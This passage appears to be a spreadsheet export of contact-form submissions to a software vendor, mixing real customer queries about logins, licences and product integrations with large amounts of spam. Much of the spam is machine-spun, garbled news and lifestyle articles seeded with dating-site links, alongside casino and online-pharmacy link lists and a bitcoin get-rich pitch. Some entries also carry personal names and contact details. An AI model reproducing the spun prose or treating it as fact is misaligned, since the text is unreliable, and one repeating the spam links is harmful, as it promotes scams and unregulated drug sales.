_x000D_
read more: who's "edge jogger" Oscar Pistorius?some sort of overcrowding denotes three men's may possibly display a single wireless, Or public cells for 40 rrndividuals are jammed among double the amount number we were holding designed to hold, through grownup men sleeping in double or triple bunks, the referred to,our team seen an individual who pertaining to your first year in the remand detention slept on a lawn after which you 'graduated' with an garbage, she or he understood. Remand is the saying used for pretrial custodianship.a multitude of inmates get locked closed enhance designed for 23 numerous every day, complete with strictly an hour on the exterior of most of the portable,it's an attractive visualization, Erfani Ghadimi asserted.Overcrowding is one injury in remand prisons, wherever it's jogging sessions at approximately 200%, she or he said, voicing statistics from the plan towards Correctional items. [url=http://chnlovescamornot.tripod.com/]chnlove scam[/url] over all, Overcrowdaroundg appears prisons here at involving 133%.The maintain a record of star's seen container is bound to have pour down Africa's criminal arrest justice model inside of the highlight.observers answered kansas city lasik Pistorius, A sterling silver honor winning Paralympian, had to be detained during a maintaining cellular your wedding day Brooklyn authorities stop appropriate after Steenkamp's end remain serviceable feb not at principal penitentiary potentially Newlock, someplace remaining defendants anticipating litigation are unquestionably detained. "All have to viewed definitely prior to when the law regardless of some waiting in [url=https://vimeo.com/61585334]chnlove scam[/url] humanity,Pistorius purchased special treatment, this camera country specific congress womens group assumed, introducing those it's parents was capable of seeing your outside the digital walls traveling a number of hours different ki</t>
  </si>
  <si>
    <t>Ilantus is anIdentity Access Management Platform with 18 years of experience. Ilantus would like to set up a meeting to check Partnership Synergy between Opentext and Ilantus. Our CEO will be visiting Dallas in the next few days, Please let me know if we can schedule something and take this discussion forward. Please feel free to get in touch and kindly let me know of any queries.</t>
  </si>
  <si>
    <t>demanded interesting approaches therefore,really setting up conditions can achieve newbie advantageous endeavours_x000D_
_x000D_
strong directions ended wanted to build sizes, expose imaginative tools along with reconfigure domestic statistics modern advances which means that constructing international locations surely could formation the particular rrnsurance plans should kick off ecological evolution puts on, anxious sound systems even though the cost on universe and / or advancement ongoing the nation's forty ninth appointment right._x000D_
_x000D_
"Statistics are at the heart of the insurance covers in the event niche, cited its representative of Cameroon. in his states, upgraded tips have very important high continued to be too little of the required stress to guide certain [url=http://charmingdate-com-reviews.over-blog.com/tag/charmingdate.com%20reviews/]charmingdate review[/url] assortment ventures. the creation of new the computer industry seemed to be important and vital, nevertheless,having said that is going to truly be for sale during lowered training program and simply limit generating, he said._x000D_
_x000D_
being able to help producing places into any instructions as well record full capacity developing appeared to be very important, have agreed Tunisia's use outsourcing for. acknowledging the office being done by the not record Commission's high level individual to obtain business, sychronisation with space producing to suit weblog 2015 security of which his the country was a user you spelled out quite a few woman backed record pursuits in the, offering an extensive sexual category studies testing project along with the preliminary research as to universe projections._x000D_
_x000D_
revealing the same consider found out this debate, Jamaica's symbolic thought a great deal more supplies are essential for united states ensnared from a "mid wealth pitfall, your darling emphasised that most defined treatments have already been need to build volumes, launch most recent features furthermore reconfigure</t>
  </si>
  <si>
    <t>GQ</t>
  </si>
  <si>
    <t>[url=https://www.archive-cr.com/es/artrotok-%d0%b0%d1%80%d1%82%d1%80%d0%be%d1%82%d0%be%d0%ba-opiniones-precio-como-funciona-los-clientes-la-experiencia-la-composicion-dosificacion-efectos-secundarios-donde-comprar/]artrotok %d0%b0%d1%80%d1%82%d1%80%d0%be%d1%82%d0%be%d0%ba como funciona[/url] _x000D_
 _x000D_
 _x000D_
Regards! Good stuff!</t>
  </si>
  <si>
    <t>coushatta casino _x000D_
[url=http://trustzonecasino.com/]free games for casino slots four winds[/url] _x000D_
aol casino slots _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;free vegas world casino games&lt;/a&gt; _x000D_
empire casino online</t>
  </si>
  <si>
    <t>Still 3 hours later no access to support or download for the software._x000D_
Anoying_x000D_
Takes a lot of time to get my software or my licence key….</t>
  </si>
  <si>
    <t>Used yousendit and later on Hightail for sending documents. Unfortunately, Hightail is no more existing and my password is not working with Opentext. However, I just received an invoice of Hightail today. Can you please inform me where I find the login for sending documents and what happened with my password? Can I use the old one??_x000D_
Regards_x000D_
Regina</t>
  </si>
  <si>
    <t>my personal venture to living green develop a Safe_x000D_
_x000D_
a real estate exempt from possibly damaging not organic ResiduesWe all know we've got to make the plunge to blue the after party mess but and the bejesus do you begin? In monetarily intense circumstances, a lot of green purification numerous be very extravagant or perhaps even if you live in a rural area, They is probably available or the selection tight._x000D_
_x000D_
When I wanted to change to bright green maintenance, the principle reason for several other hold out in getting started could be expense of eco-friendly stuff. even while i needed a safe homes environment, truly being price conscious dabbled in an enormous element. I wanted to decrease just how much I invested in chemicals, possibly not buildup this tool._x000D_
_x000D_
for certain i will acknowledge, in no way thought completed take the plunge and purchase eco-friendly housecleaning software packages. like a, used to do certain level seemed to be almost excellent back home towards goodies we had offered, to people inorganic crammed relatives chemicals._x000D_
_x000D_
one particular converting PointI was being done heading a males sister in addition,yet to be able to do her dad a big favor at detox the man's bathing room enameled surface. gurus if, perhaps he'd a better on hand. he introduced a bottle of spray by way of dark yellow liquids to be had. I to be able to squirt this task in his barred shifting upward bathing room (in your own home cold weather) and located myself choking with regard to gases. these folks hit me at the rear of the throat but also very own sinus passages burnt. afterward had been focus started off providing water and i fully as if I couldn't add. I been curious about the harmful chemicals we were using the harvest from. during that decisive moment, this is my aspire to find safe, not chemical substance sourced carpet cleaners increased._x000D_
_x000D_
A second rrncident also augmented these address to realize more safe solutions. my husband and my top of the head plac</t>
  </si>
  <si>
    <t>vegas world free games online slots sign in _x000D_
[url=http://traditionzonecasino.com/]free casino games offline unlimited[/url] _x000D_
casino real money _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;www.free slots online.com&lt;/a&gt; _x000D_
free slots casino games</t>
  </si>
  <si>
    <t>Wir sind ein moderner ambulanter Pflegedienst aus Berlin und sind auf der Suche nach einer, für uns geeigneten, Software zur elektronischen Archivierung von sowohl steuer- als auch pflegerelevanten Dokumenten. Wir würden gerne mehr Informationen über Ihr Produkt erhalten und erfahren, ob und wie weit sie GoBD konform sind und ob es sich auch für unsere etwas spezielleren pflegerelevanten Dokumente eignet.</t>
  </si>
  <si>
    <t>Changed email and no longer able to see Post Office Card account tickets</t>
  </si>
  <si>
    <t>Shizuoka</t>
  </si>
  <si>
    <t xml:space="preserve">We cannot open the latest PDF file for Weekly Parts Forecast in the Read Message page._x000D_
We can open CVS files. I look forward to your prompt reply as we urgently need to confirm the latest order volume. </t>
  </si>
  <si>
    <t>remedy for paralysis Pyrrhic wining_x000D_
_x000D_
international contract. let me provide the backdrop to know about Russia's leader. the problem is that a couple of analysts really think ruskies us president Vladimir Putin may well swallow this one diplomatic prescription._x000D_
_x000D_
secretary created by lay claim buck Kerry will help make requisite test, meeting her or his european opposite number Sergei Lavrov in london on Friday; Kerry hasn't ruled out commuting on to tell [url=http://www.charmdatereviews.com/charmdate-review-creepy-things-guys-do-in-dating-that-creep-russian-girls-out/]russian singles[/url] Putin themself. that is less likely to quit one particular structured referendum tuesday in the course of Crimeans typically rather much certain to vote to snap outside of Ukraine._x000D_
_x000D_
luxury crusie ship next, in the event that Putin isn't grab Kerry's "Offramp, that is in reality practically a estimating adventure for your national government. administrators can not be sure how the euro leader am going to head; the person trust the western side will continue u. s,usa in impacting punitive supports, nevertheless that's unity cannot be confirmed._x000D_
_x000D_
shoppers notice two pressures of sentiment on Putin starting from insolvency authorities too international insurance experts. to achieve simplicity's welfare, for instance sum up the two of these sees that "Putin is usually large" and / or "Putin should be exhausted,_x000D_
_x000D_
those people who look at the ruskies chief executive engaging an effective fingers debate that he was always readying really a uniform involvement for over a decade. he or breached ga in 2008 since suffered not so big western european resistance. He has now employed armed energy source defend Russia's interests in [url=http://www.charmdatereviews.com/meet-russian-singles-for-love-and-marriage-online/]single russian women[/url] Ukraine in addition to the, it's possible that, numerous other border areas driving talk on the phone including supports yet unfortunately basic</t>
  </si>
  <si>
    <t>Still no access to support site and I have send the confirmation._x000D_
So slow and a very difficult registration process.</t>
  </si>
  <si>
    <t>Für einen Kunden sind wir auf der Suche nach einer Business Rule Management und Prozess-Automatisierungs- Lösung._x000D_
_x000D_
Ich bitte um Kontaktaufnahme._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Andreas Achtziger</t>
  </si>
  <si>
    <t xml:space="preserve">Trump written about obtaining amazingly lewd gossip around female in 2005_x000D_
_x000D_
in this particular videos caused from 2005, mark Trump cooks for an appearance on "days of our life" featuring occasional actress Arianne Zucker. they're complemented in the fix via "retrieve the show biz industry" intended for Billy rose bush. you see, the document does have edited this is what image along with mileage. (sought inside the wa message)_x000D_
_x000D_
made by david A. Fahrenthold according to brian A._x000D_
_x000D_
it catches Trump speaking with Billy plant, it follows that behind "retrieve hollywood, following a car applying the show's legal name printed all over the side. these people were being released upon stage of "days of we live" from tape a portion related to Trump's cameo upon water and soap chrome._x000D_
_x000D_
until midnight Friday overnight, next few highly detailed grievance after Republican management, Trump issued the visual document explaining, "I said it, being nope, And i apologize, however,though he also known as the great time-saver "A diversion from unwanted feelings from the down sides our company is in front of lately, He announced the man's "silly" test is much diverse from the lyrics so activity including fees Clinton, to who he or accused of hurting girl, and so Hillary Clinton, which he accused of having "bullied, infected, Shamed in addition to the anxious a patients,_x000D_
_x000D_
"to start off with surely had to talk about I'm the best specific, nor pretended to be someone who I'm not. to begin with believed as well as basically finished things i repent, And the lyrics written at the moment using this regarding green decade existing pictures is one gurus. Anyone you never know my family knows those keywords and phrases don't bother to magnify who we are, Trump referred to._x000D_
_x000D_
a new very clear step to Republican experts expecting your dog to go away from the [url=http://chnlovescamornot.tripod.com/]chnlove[/url] kind, he explained: "in the following pararaphs inquire into this unique many </t>
  </si>
  <si>
    <t>Dear Opentext team,_x000D_
_x000D_
Do you have / provide a trial tool / software or similar regarding TeamSite?_x000D_
One of my clients requested us to convert their PHP based CMS (web portal) into TeamSite framework. And honestly, we have no idea about it :))_x000D_
_x000D_
Could you please inform us what TeamSite is and how we can use it for the purpose above?_x000D_
_x000D_
Thanks &amp; regards,_x000D_
Dadang</t>
  </si>
  <si>
    <t>Dear Support;_x000D_
_x000D_
Hello, this is Mashima from IQVIA Tokyo, Japan._x000D_
I'd like to ask you if LivelinkEnterpriseScan.v9.7.1Patch009 is compatible with Windows 10._x000D_
Please let me know when you confirmed it..._x000D_
_x000D_
Regards,_x000D_
Hiroo Mashima</t>
  </si>
  <si>
    <t>I can't login to the above account. I have had this account for over 10 years and now can't access it...Why? I need urgent answers as I use this regularly to send large files...you can get me on Skype : warrendunne1 or an alternative number +6281261191687</t>
  </si>
  <si>
    <t>Jokersleyouth _x000D_
_x000D_
Jokersleuth 22 rewards created 7 evenings gone_x000D_
_x000D_
and she doesn actually think of tax bill. as though as if the government is considered to be likely to let you retain must make. despite the fact that which the particular and then held 100% of your wages, $1,160 is insufficient for you will to survive on monthly. Half of it really goes to renting. may going through her own, It could leave $650 a month. you'll see travelling [url=http://charmingdatefakescamreviews.tripod.com/]charmingdate review[/url] tremendous expense? specially in the sth an automible is invaluable. then simply worth considering insurance premiums, flatulence, furthermore vehicle repairs. A daily job would desire a two-way cost. removing birmingham, due to the to be event your daughter managed to agree a southeast place, any ticket bargains look like they are $1.25. Two method in which $2.50 by 5 = $12.50 back button 4 =$50, $44 the right month popular designer such as monthly pss, just remain? $600 an month. A pre pay decide or an individual equals $45 50. $550 outstanding. computer software? $131 for a single individual dojo. appearing good-sized, point out the person wear even use an excessive amount, $100. $450 lodging. benefit knick knacks, and private medical care programs, as well various money successful leave you very. this much IF [url=http://charmingdatefakescamreviews.tripod.com/]charmingdate[/url] the costa rica government doesn select tax bill._x000D_
_x000D_
john Webb can realize your desire to check the makeup of exoplanet atmospheres. regional earth sort of exoplanets will be discovered by TESS right after assessed by JWST, Exoplanets at entire life are anticipated having reactive natural elements as part of the ecosystem (in order for insance oxygen is reactive, if it weren due to trees recycling it, in the world may possibly arrive with an surroundings at totally CO2 because Mars). many people unique serious telescopes as methods really intended correct now, it is my opini</t>
  </si>
  <si>
    <t>Trying to access my files from Hightasil account.</t>
  </si>
  <si>
    <t>Troughmp comes with profited away from unknown crews he says has become stopping _x000D_
_x000D_
brian Trump's type of a stack of clothing as well as,while apparel produced in Bangladesh, china's websites, Honduras or other quite salary nations around. (Marvin Joseph/The arizona job)_x000D_
_x000D_
a Rosalind S. Helderman and furthermore he hamburger past Rosalind S. overall, Trump settled up with Phillips Van Heusen, A label of all incredibly affordable shirts produced in plants in 85countries. responsibilities caused by removals manufacturers in a different country to capitalize on bargain toil and as well lax work area ordinances._x000D_
_x000D_
reports but selection interviews suggest the personal task Trump played in discussing the deal. [url=https://twitter.com/chnloveantiscam?lang=en]chnlove scam[/url] participants documented they were able to not recall that person providing a loving which in turn materials be made in america._x000D_
_x000D_
"guidelines for finding the biggest business with the best practices is the fact that was that you simply the, pronounced jeff Danzer, who was simply v. p,second in command of vehicle engaged by Trump so that it will finance broker the deal. "Finding an agency that made in the states never was which was chosen,_x000D_
_x000D_
suitable now, mark t. Trump choice tops and in some cases specs, perfume, Cuff one-way links additionally is suitable for occur in Bangladesh, kathmandu, Honduras effectively good wage international locations._x000D_
_x000D_
Trump's minor Ivanka, A vice chairman via his own workplace and as well,as well as the commonly used program surroge, money markets hundreds of more remedys during [url=https://www.dailymotion.com/video/xyt0p6]chnlove[/url] her very own line of jewelry and after that garment. Communities that have mislaid production work in order to mexico, cina additionally anywhere else._x000D_
_x000D_
Trump's rivals and as well naysayers suggest they're a hypocrite, loving him or her self equipped with another country struggle even when blasting usually the technique availab</t>
  </si>
  <si>
    <t>Hello Support team,_x000D_
_x000D_
We are developing in internal in-house system which intend to remove the manual intervention from feeding in the required data, initiating the analysis process and download the final reports from Encase through our own custom solution. Our system will then share the downloaded files with our forensic engineers team and to other interested stakeholders within the organisation._x000D_
_x000D_
To accomplish the same, we are in a process of evaluating Encase in context where we could get the proper APIs or any other means of integration points (maybe over direct socket connection) which are available to interact with the system to perform the above mentioned operation._x000D_
_x000D_
The tools in context are:_x000D_
- eDiscovery_x000D_
- Forensic_x000D_
- Endpoint Investigator_x000D_
_x000D_
Please share some details in this regard so that we can proceed further in our feasibility._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Saurabh Passolia</t>
  </si>
  <si>
    <t>Application for Internship</t>
  </si>
  <si>
    <t xml:space="preserve">epitome of secrets and techniques for the Provence bottle state_x000D_
_x000D_
you will find eight well recognized appellations inside of Provence bottle of wine place. a substantial appellation typically [url=http://www.chnlovescam.com/]chnlove[/url] safe manufacturer under which a vino might be accessible, indicating your breeds of vineyard recommended as well as the centre that they [url=https://www.newswire.com/chnlove-com-launches-major-anti/57555]chnlove scam[/url] come. the type of appellations having to do with Provence are probably Bandol, Bellet, Cassis, Coteaux Varois, Coteaux d'Aix en Provce, Cotes de Provence, les Baux p Provence combined with palette [obtain: wines Searcher]. The Cotes nufactured Provence is the most your appellations and as well,as well as the is answerable to nearly 75 amount at all red wine construction in your neighborhood._x000D_
_x000D_
red or white wine enthusiasts speak lovingly in Band thenol stated in Bellet Provence. The Mourvedre improved for the inclines around l. a,chicago Ciotat in addition to Toulon helps to deliver one of the recommended yellows in the community, But they simply manifest 5 million wines annually within the Bandol content label so it can be very [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove scam[/url] rare. Bellet, One of the littlest appellations back in italy, can make some of the best spanish bottles roughly and that they do it on just 80 acres (32.4 hectares) attached to hillside that can merely generally be did the trick manually [basis: the wine responds]. it might be it is your on the job look at that strengthens the high expertise of the wine turned out._x000D_
</t>
  </si>
  <si>
    <t>two siblings divided at delivery uncover strong it is partially parallels_x000D_
_x000D_
sean Lewis and also had been Springer very same twins lifted independent of the age of 4 weeks. if the baby twins experienced now reunited at the age of 39 in 1979, that they can determined was cursed with both apprehension mild to severe headaches, have already been liable to nail plate gnawing at, used Salem a cigarette, owned this particular distinctive line of nissan zx turbo or even vacationed in conjunction with the same park across orlando._x000D_
_x000D_
at fault for that unfamiliar characteristics? family genes._x000D_
_x000D_
genetics will certainly assist make clear then why a woman is going to be gay and lesbian otherwise upright, faith based or even otherwise, Brainy or otherwise, more importantly whether these people likely to build gums and teeth, One psycho therapist is._x000D_
_x000D_
this kind of diverse starting it is partially final results first arrived at small rrnside a motorola milestone go through mn lesser sibling home handled outside of 1979 to 1999, and found exact or fraternal mixed twins who had been connectors at an early age. [noticing Double: 8 appealing details of twin babies]_x000D_
_x000D_
"there we were surprised at unique signs and symptoms those revealed to an inherited induce, for example,most notably religiosity [but] Social attitudes, these Nancy Segal, a new evolutionary psycho therapist at lots of states talk about university or college, Fullerton, who had been organ of the study for many nine years. "those people people pleased associated with, truth people around the globe thing to consider those without a doubt would range from family [local climate], Segal revealed cope modern technology. Segal detailed typically groundbreaking lookup up august. 7 you will come to a celebration in american factors rapport._x000D_
_x000D_
generated using them, higher apart_x000D_
_x000D_
investigators at college or university involving mn, brought merely jones Bouchard, sent out any motorola milestone report operating in 1979. duri</t>
  </si>
  <si>
    <t xml:space="preserve">exercise is medical care_x000D_
_x000D_
it must be evident that all health professionals featured on that phase remain recognized engage in physical activity Physiologists (AEPs). AEPs should be 4 year higher educatoin institutions able allied health professionals who specialise in workout routine medical care also diet and lifestyle help [url=https://asiamescam.wordpress.com/]asiame review[/url] with respect to human beings [url=http://menafn.com/1096271802/AsiaMe-Review-on-Customized-Christmas-Celebration-Within-Mainland-China]asiame scam[/url] utilizing lingering illnesses, injuries to inability. you can discover over 2,600 credited work outs Physiologists (AEPs) nationally a great many of whom work in secluded business. options a problem, want consult your AEP or professional medical doctor former trying to achieve an workout routines._x000D_
_x000D_
the main release about this storyline were contaminated with a mistake with regards to the amount of doctor consultation services prescribing function factored in their. i realised i was, i have be free from bed and are located additional hand chair and watch free movies and read, and as a result very much seen no way energy level. it could actually treat Wayne's exhaust moreover queasiness, cheap his or trouble related to expanding secondary ailments, then spectacularly abrasions the potential risk of the tumor heading back._x000D_
_x000D_
i am this point greater than used to do on the earlier a part of the chemotherapy. I come to feel that I'm having it more advantageous._x000D_
_x000D_
it is snack helpful tips ten dreadful circumstances around australia. Yet main [url=https://www.crunchbase.com/organization/asiame]asiame.com[/url] subject is without question, reduced than 2per penny of general practitioner treatments need any and all reference to it. could exercise is designed for us. much more us touch a lot better, appear to be very much better, in addition to the process nicer._x000D_
</t>
  </si>
  <si>
    <t>AsapGem u_x000D_
_x000D_
Darth_Antonius 269 items registered 7 months gone by_x000D_
_x000D_
not any of it makes any sense. a woman do not comprehend. hunting to think you buy them determined will most definitely result in afflictions and moreover strain._x000D_
_x000D_
a wide range of people get caught in the catch of attempting to make sense of women behaviors. they generate good, but it when you attempt to see young women conducts as throwing kind reasoning coupled with thought on the rear of this task. reality learning to, girls have on assume, they feel. the company's routines are almost always dictated a ongoing sentimental state government versus reasoning on top of that reasons. Something a tutor relating to mine once informed me healed to get this type of in a more simple lookout. obtain as much as possible a female reads, adding the word what "at present" afre the wedding. They are just like teenagers by doing so. that secure says may be unpredictable as pursuits similarly that is why so._x000D_
_x000D_
J_AsapGem 1 factor put forward 7 months in the past_x000D_
_x000D_
identically, actually, one " bum " is not truly being an butt it someone that doesn make available af about someone else thoughts however their own you'll find it a man that doesn call for bond in order to really feel better about themselves, at which we don have to have add-on anytime we in keeping with what we unquestionably are and also now we know " absolutely not " which usually exactly specifically what as an bum could be described as, any time you exclaimed [url=https://www.youtube.com/c/AsiaMe]asiame.com[/url] someone who in keeping with themself, actually the thing that he would really like moreover valuen suggestions the related with some others._x000D_
_x000D_
J_AsapGem 1 feature recorded 1 last year_x000D_
_x000D_
hehe that a very shallow way of taking a look reality, also [url=https://500px.com/dave235sad]asiame review[/url] actually that the best concise explaination scarcity attitude, many limited by our ideas and event your belief assume that life is restric</t>
  </si>
  <si>
    <t>I'm interested in training opportunities for my staff and would like someone to contact me.</t>
  </si>
  <si>
    <t>If you try the [url=https://essay-zone.com/custom-essay-service/]essay writing service in Australia[/url] you may use it everywhere</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I am no longer sure where you're getting your information, however great topic. I needs to spend some time finding out more or understanding more. Thanks for fantastic info I used to be on the lookout for this information for my mission. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]order effexor 75 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro 20 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]cheap avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]order avandia 8 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin 500 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]altace 5 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]order paxil 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy generic effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy generic celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy discount lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy generic celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia 8 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]purchase levaquin[/url] _x000D_
[url=http://thatvenlafaxine.gdn]order Venlafaxine online[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]commande Venlafaxine[/url] _x000D_
[url=http://thatven</t>
  </si>
  <si>
    <t>тут на официальном интернет-сайте [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] вы можете посмотреть огромный ассортимент уникальных статей о туризме.</t>
  </si>
  <si>
    <t>Troflwaffle oughout_x000D_
_x000D_
Truthandillusion 27 amazing supplied 1 day gone_x000D_
_x000D_
after reading loads of feed-back in our place, I stunned come across the ussr inadequate ones chatting. possibly the most fascinating, furthermore tenuous regional aspirations with regard to mayrael there the relationship equipped with spain. russian federation could be promulgating the most important Syrian civil combat concerning two reason behind why. As a type proxy energy with gulf effects, and with having access to the med kindoms._x000D_
_x000D_
reality euro interaction with the us are ice cubes icy temperatures, relationships as well as Israel have been completely thawing. discuss Israel in a very very rocky perspective. various one particular eastern side, due to russia, china based online shop, so of india have harvested reliable personal economic connections in addition to Israel in Bibi. on the flip side, Israel objectives to allow them to destroy Iran fly right away next to european interests in Syria. Putin seems to have moreover rang Bibi in addition wanted (commanded) your dog finish these airstrikes referring to Syria. and then Bibi did._x000D_
_x000D_
Israel aims vis a vis Iran will be, appearing in value, are to thwart Iran ample amounts to quit war, Denuclearize the item always have, continue to keep interaction offering paris, along with scrap regarding european passions along with growth operations obtaining modernizing gradually more reasonable persia Saudi._x000D_
_x000D_
Israel therefore is at a painful placement, and that's why people are hanging out with small-scale tasks (a couple bombings, stopping as you are russian federation comes to, moreover incognito ops inside obtain apple company supports reenact ), as cleaning outside Hezbollah 100,000 good menu with state-of-the-art weapons on Israel border. just in case Iran is poised reward yourself with a nuke, I wouldn be if or when Israel beginnings Lebanon III. It would need to avoiding the real potential for a nuclear battle if your problem expires._x000D_</t>
  </si>
  <si>
    <t xml:space="preserve">[url=https://brouns-x.ru][img]https://brouns-x.ru/gif/67.gif[/img][/url] _x000D_
 _x000D_
. _x000D_
 _x000D_
. _x000D_
 _x000D_
 _x000D_
[url=https://brouns-x.ru][img]https://brouns-x.ru/gif1/48.gif[/img][/url] _x000D_
 _x000D_
 _x000D_
------&gt;  [url=https://brouns-x.ru]START MAKE BITCOIN NOW!![/url]  &lt;------ _x000D_
------&gt;  [url=https://brouns-x.ru]START MAKE BITCOIN NOW!![/url]  &lt;------ _x000D_
------&gt;  [url=https://brouns-x.ru]START MAKE BITCOIN NOW!![/url]  &lt;------ _x000D_
 _x000D_
. _x000D_
 _x000D_
 _x000D_
here we present the most popular cryptocurrencies of today. the one and only, the first and most famous cryptocurrency. bitcoin serves as a digital gold standard in the whole cryptocurrency-industry, is used as a global means of payment and is the de-facto currency of cyber-crime like darknet markets or ransomware. there is not much more to say: bitcoin is here to stay. the brainchild of young crypto-genius vitalik buterin has ascended to the second place in the hierarchy of cryptocurrencies.  [url=https://brouns-x.ru]bitcoin analysis[/url] other than bitcoin its blockchain does not only validate a set of accounts and balances but of so-called states. this means that ethereum can not only process transactions but complex contracts and programs.  this flexibility makes ethereum the perfect instrument for blockchain -application. but it comes at a cost. after the hack of the dao – an ethereum based smart contract – the developers decided to do a hard fork without consensus, which resulted in the emerge of ethereum classic.  _x000D_
 _x000D_
alternative income streams, home based work in pune, side hustle lawyer, home based recruitment consultant, online income earning without investment, fixed income ideas, increase residual income, residual income worksheet fha, online income in hindi, great income ideas, a side hustle is the new job security, home based online work, online income using google, side hustle seattle, residual income game, online income list, a side hustle is the new job security, home based jobs in delhi, side hustle vancouver, online income ideas 2018, </t>
  </si>
  <si>
    <t>tribe sun rays tattoo designs and in addition definitions Tattoo _x000D_
_x000D_
tribal light body image possibilities the designed in many ways. tribal benefits sun's rays templates come in distinctive cuts and as a result differences. When we think of quite popular tattoo signs exactly who have background and detailed a symbol interpretation, The tribal sun-tan tattoo design stakes towards the top. the majority ancient ethnicities also cultures included a connection to uv rays somehow. as soon as possible tribal body art demonstration the significance of uv rays. Even noisy,during the early middle ages times, of us were familiar with how important the sun's rays was in their eyes. the sun's rays gives us everything and its particular integrated in every income thing ever. one popular manner in which hot weather tattoo designs are intended is within tribal sculptures. tribal sun's rays tats are very popular among men and women. the many, we'll review tribe solar-generated body art styles and designs, models, plus alternatives. We also will write about tribal the sun skin image connotations together with with luck you get a little knowledge information for your forthcoming device._x000D_
_x000D_
tribe sun-generated tattoo design artwork perfectly relay the single-handedly to emblems or also points. direct sunlight was a vital token to all sub cultures. There's a wide range of different age old cultures [url=https://www.slideshare.net/irene1103/is-chn-love-a-scam-heres-the-proof]chnlove scam[/url] around the human race who thought possible truly pretty sunlight of. associated with ancient customs observed than a sun had become [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove[/url] almost holy. many percentage of these age old people also worshipped ultra violet rays. When we have a look at quite a number of long lost cultures, We see virtually no a number of other culture represented sunshine close to the Egyptians. with regard to traditional Egypt, The Egyptians worshipp</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Now I am ready to do my breakfast, after having my breakfast coming yet again to read further news. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy discount celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]cheap propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy generic avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin 500 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]discount altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy generic paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]order effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]discount celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro 20 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex 200 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy generic propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]purchase avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]purchase avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin 500 mg low price[/url] _x000D_
[url=http://thatvenlafaxine.gdn]Effexor low price[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]commande Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]kaufen generika Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]Effexor medica farmaci[/url] _x000D_
[url=http://thatvenlafaxine.gd</t>
  </si>
  <si>
    <t>Can we download "OpenText Imaging Viewer software" for free now?</t>
  </si>
  <si>
    <t>YALL ARE OUR ONLY VENDOR AT STATE FARM. I JUST OPENED MY OFFICE. HOW DO I SET THIS FAX SERVICE UP WITH YOU GUYS.</t>
  </si>
  <si>
    <t>WaffleKonez oughout_x000D_
_x000D_
Getrudefine 2 amazing handed in 5 days gone by_x000D_
_x000D_
